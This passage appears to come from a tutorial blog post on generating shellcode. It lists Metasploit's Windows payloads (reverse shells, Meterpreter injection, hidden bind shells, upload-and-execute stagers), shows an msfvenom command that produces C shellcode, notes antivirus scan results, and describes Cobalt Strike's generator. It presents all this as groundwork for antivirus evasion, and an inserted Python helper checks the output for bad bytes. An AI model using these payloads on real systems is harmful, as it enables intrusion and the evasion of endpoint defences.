windows/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows wininet)
windows/meterpreter/reverse_https_proxy Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP using SSL with custom proxy support
windows/meterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker over IPv6
windows/meterpreter/reverse_nonx_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker (No NX)
windows/meterpreter/reverse_ord_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_allports Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/meterpreter/reverse_tcp_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
windows/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
windows/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTP (Windows winhttp)
windows/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Tunnel communication over HTTPS (Windows winhttp)
windows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell
windows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell
windows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service
windows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service
windows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)
windows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)
windows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. Listen for a connection (No NX)
windows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)
windows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection
windows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)
windows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection
windows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6
windows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)
windows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker
windows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support
windows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)
windows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)
windows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)
windows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection
windows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)
windows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection
windows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6
windows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)
windows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker
windows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
windows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session
windows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session
windows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)
windows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)
windows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)
windows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection
windows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)
windows/shell/find_tag Spawn a piped command shell (staged). Use an established connection
windows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6
windows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)
windows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker
windows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support
windows/shell_bind_tcp Listen for a connection and spawn a command shell
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell
windows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not comming from the IP defined in AHOST. This way the port will appear as “closed” helping us to hide the shellcode.
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
windows/speak_pwned Causes the target to say “You Got Pwned” via the Windows Speech API
windows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)
windows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)
windows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)
windows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection
windows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)
windows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection
windows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6
windows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)
windows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker
windows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support
windows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as “closed,” thus helping to hide the shellcode
windows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.
windows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)
windows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)
windows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)
windows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)
windows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection
windows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)
windows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection
windows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.
windows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)
windows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP
windows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6
windows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)
windows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
windows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker
windows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support
windows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)
windows/x64/exec Execute an arbitrary command (Windows x64)
windows/x64/loadlibrary Load an arbitrary x64 library path
windows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)
windows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)
windows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp)
windows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp)
windows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell
windows/x64/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session
windows/x64/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session
windows/x64/shell/bind_ipv6_tcp Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
windows/x64/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/shell/bind_tcp Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)
windows/x64/shell/bind_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
windows/x64/shell/reverse_tcp Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)
windows/x64/shell/reverse_tcp_uuid Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/shell_bind_tcp Listen for a connection and spawn a command shell (Windows x64)
windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64)
windows/x64/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
windows/x64/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)
windows/x64/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
windows/x64/vncinject/reverse_http Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/vncinject/reverse_https Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)
windows/x64/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)
windows/x64/vncinject/reverse_winhttps Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)

An example

Run the command: msfvenom -a x86 -p windows/exec cmd=calc.exe -f c > 1.txt

image-20220630135442191

Can the shellcode obtained this way actually execute? We write a small demo to verify it:

The demo confirms that the shellcode generated by MSF executes successfully. While we are at it, let us also drop it into an antivirus engine for a scan. The results are as follows:

image-20220630140647170

Running the dir command we tested earlier in the same way gives the following result:

image-20220630142441560

We find that no error is reported, yet the intended effect is not achieved. So while msf conveniently generates shellcode for us, we should also verify it ourselves to avoid misjudging the result in cases like this.
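One such self-check, added here as an example that is not part of the original article or of Metasploit: parse the C-format output msfvenom writes to 1.txt back into raw bytes, then report its size, any bad characters (0x00 by default) and the plaintext strings it carries, such as the command line, before any demo is run. The sample buffer below is constructed to have the same shape as the tool's output and contains no real shellcode.

```python
import hashlib
import re

# Constructed sample in the shape of `msfvenom -f c` output; the bytes are
# placeholders (NOPs, a short jump, the string "calc.exe", two nulls),
# not real shellcode. The article's actual 1.txt is not reproduced here.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] = 
"\x90\x90\xeb\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x00\x31\xc0"
"\xcc\x00";
'''


def parse_c_shellcode(text: str) -> bytes:
    """Decode the concatenated C string literals ("\\x..." "\\x..." ;)
    that msfvenom -f c emits into the raw byte sequence."""
    out = bytearray()
    for literal in re.findall(r'"((?:[^"\\]|\\.)*)"', text):
        i = 0
        while i < len(literal):
            if literal[i] == "\\":
                if literal[i + 1] != "x":
                    raise ValueError(f"unsupported escape at {i}: {literal[i:i+2]}")
                out.append(int(literal[i + 2:i + 4], 16))
                i += 4
            else:                      # bare ASCII character inside the literal
                out.append(ord(literal[i]))
                i += 1
    return bytes(out)


def find_bad_chars(sc: bytes, bad=(0x00,)) -> dict:
    """Map each forbidden byte value to the offsets where it occurs.
    A null byte terminates C strings, so 0x00 is the usual first entry."""
    return {b: [i for i, x in enumerate(sc) if x == b] for b in bad if b in sc}


def report(text: str, bad=(0x00,)) -> dict:
    """Summarise a msfvenom -f c blob: length, hash, bad chars and the
    printable strings (4+ chars) an analyst or scanner would see in it."""
    sc = parse_c_shellcode(text)
    return {
        "size": len(sc),
        "sha256": hashlib.sha256(sc).hexdigest(),
        "bad_chars": find_bad_chars(sc, bad),
        "strings": [s.decode() for s in re.findall(rb"[\x20-\x7e]{4,}", sc)],
    }


if __name__ == "__main__":
    print(report(SAMPLE_C_OUTPUT))
```

The constructed sample shows both checks firing: the command string is readable in clear, and two null bytes would break any injection that relies on a C string copy.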

Generating Shellcode with CS

The basic usage of CS will not be repeated here; we select the following function:

image-20220630144824778

The following dialog appears. Choose the desired shellcode format and the corresponding listener, then click Finish to generate it.

image-20220630144855978

The file holding the generated shellcode looks as follows; compared with MSF it offers somewhat less flexibility.

image-20220630144958934

Closing remarks

With the methods described above, you should to a fair extent be able to obtain the shellcode you want; how it is used afterwards is up to each reader. This article is meant to lay the groundwork for learning AV evasion.
